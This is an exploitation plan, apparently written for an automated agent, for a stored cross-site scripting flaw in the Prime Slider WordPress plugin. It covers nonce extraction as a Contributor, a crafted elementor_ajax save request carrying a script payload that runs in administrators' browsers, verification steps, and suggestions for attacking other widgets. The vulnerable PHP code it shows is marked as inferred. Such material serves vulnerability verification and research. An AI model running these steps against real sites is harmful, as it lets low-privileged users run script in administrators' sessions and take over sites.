Prime Slider <= 4.1.10 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'follow_us_text' Parameter

This research plan outlines the steps required to verify and exploit the Stored Cross-Site Scripting (XSS) vulnerability in the Prime Slider – Addons for Elementor plugin (CVE-2026-4341).

---

1. Vulnerability Summary

• Vulnerability: Stored Cross-Site Scripting (XSS)
• Affected Parameter: follow_us_text (setting within the Mount widget)
• Vulnerable Function: render_social_link() in modules/mount/widgets/mount.php
• Sink: echo statement without escaping.
• Reason: The plugin fails to sanitize the follow_us_text input when saved via Elementor and fails to escape it when rendering the widget on the frontend.
• Required Permissions: Authenticated (Contributor-level or higher) with access to the Elementor editor.

2. Attack Vector Analysis

• Endpoint: wp-admin/admin-ajax.php
• Action: elementor_ajax (internal action: editor_post_save)
• Payload Location: The follow_us_text key within the settings object of a widget of type prime-slider-mount.
• Preconditions:
  1. The attacker must have permissions to edit a post with Elementor (Contributor+).
  2. The "Mount" widget must be added to the post.
  3. The show_social_share setting must be set to yes (default).

3. Code Flow

1. Input: A user with Contributor+ access edits a post using Elementor and adds a Mount widget (prime-slider-mount).
2. Storage: When the user saves the post, Elementor sends a request to admin-ajax.php with action=elementor_ajax. The widget data is stored in the _elementor_data post meta.
3. Processing: In modules/mount/widgets/mount.php, the follow_us_text control is registered using Controls_Manager::TEXT.
4. Rendering: When the post is viewed, the Elementor renderer instantiates the Mount class and calls its render() method.
5. Sink: The render() method calls render_social_link() (or uses the setting directly in the template). Based on the vulnerability report, render_social_link() outputs the value:

   // modules/mount/widgets/mount.php (inferred logic)
   protected function render_social_link() {
       $settings = $this->get_settings_for_display();
       if ( ! empty( $settings['follow_us_text'] ) ) {
           echo '<span class="some-class">' . $settings['follow_us_text'] . '</span>'; // VULNERABLE SINK
       }
   }
   

4. Nonce Acquisition Strategy

To save Elementor widget data via the API, a valid Elementor AJAX nonce is required.

1. Create Post: Create a new draft post as a Contributor.
2. Navigate to Editor: Use browser_navigate to visit the Elementor editor URL for that post: wp-admin/post.php?post=[POST_ID]&action=elementor.
3. Extract Nonce: Use browser_eval to extract the nonce from the elementorConfig object:
   • browser_eval("window.elementorConfig?.ajax?.nonce")
4. Alternative: The nonce can also be found in the HTML source of the editor page inside a script block defining elementorConfig.

5. Exploitation Strategy

The exploit involves sending a crafted elementor_ajax request to inject the XSS payload.

Step 1: Save Malicious Widget Data

• URL: http://[target]/wp-admin/admin-ajax.php
• Method: POST
• Content-Type: application/x-www-form-urlencoded
• Parameters:
  • action: elementor_ajax
  • _nonce: [Extracted Elementor AJAX Nonce]
  • actions: A JSON string representing the save action.

  {
    "editor_post_save": {
      "action": "editor_post_save",
      "data": {
        "id": [POST_ID],
        "status": "draft",
        "elements": [
          {
            "id": "exploit-section",
            "elType": "section",
            "elements": [
              {
                "id": "exploit-column",
                "elType": "column",
                "elements": [
                  {
                    "id": "exploit-widget",
                    "elType": "widget",
                    "widgetType": "prime-slider-mount",
                    "settings": {
                      "follow_us_text": "Follow Us <script>alert(document.domain)</script>",
                      "show_social_share": "yes",
                      "slides": [
                        {
                          "title": "Slide 1",
                          "sub_title": "Test"
                        }
                      ]
                    }
                  }
                ]
              }
            ]
          }
        ]
      }
    }
  }
  

Step 2: Trigger the XSS

• Navigate to the frontend view of the post: ?p=[POST_ID].
• The payload will execute automatically in the browser of any user (including Administrators) who views the page.

6. Test Data Setup

1. User: Create a user with the contributor role.
2. Post: Create a draft post (post_type=post) and note the ID.
3. Plugin Config: Ensure Prime Slider is active and the Mount widget is enabled in the plugin settings (it is usually enabled by default).

7. Expected Results

• The editor_post_save request should return a 200 OK with a JSON response containing "success": true.
• When viewing the post, the HTML source should contain:
  <span>Follow Us <script>alert(document.domain)</script></span>
• A browser alert box should appear showing the site domain.

8. Verification Steps

1. Database Check: Use WP-CLI to check the _elementor_data meta for the post:
   wp post meta get [POST_ID] _elementor_data
   Verify that the follow_us_text field contains the <script> tag.
2. Frontend Check: Fetch the post content and grep for the payload:
   http_request('GET', 'http://[target]/?p=[POST_ID]')
   Grep for Follow Us <script>alert.

9. Alternative Approaches

• REST API: Elementor also supports saving via the REST API if the AJAX method is restricted. The endpoint is /wp-json/elementor/v1/globals/.
• Other Widgets: The vulnerability description suggests the render_social_link() function is at fault. If this function is shared (via a trait like Global_Widget_Controls mentioned in the source), other widgets in the Prime Slider plugin may also be vulnerable to the same payload in the follow_us_text parameter. Check widgets like Isolate or Blog if they use similar social share features.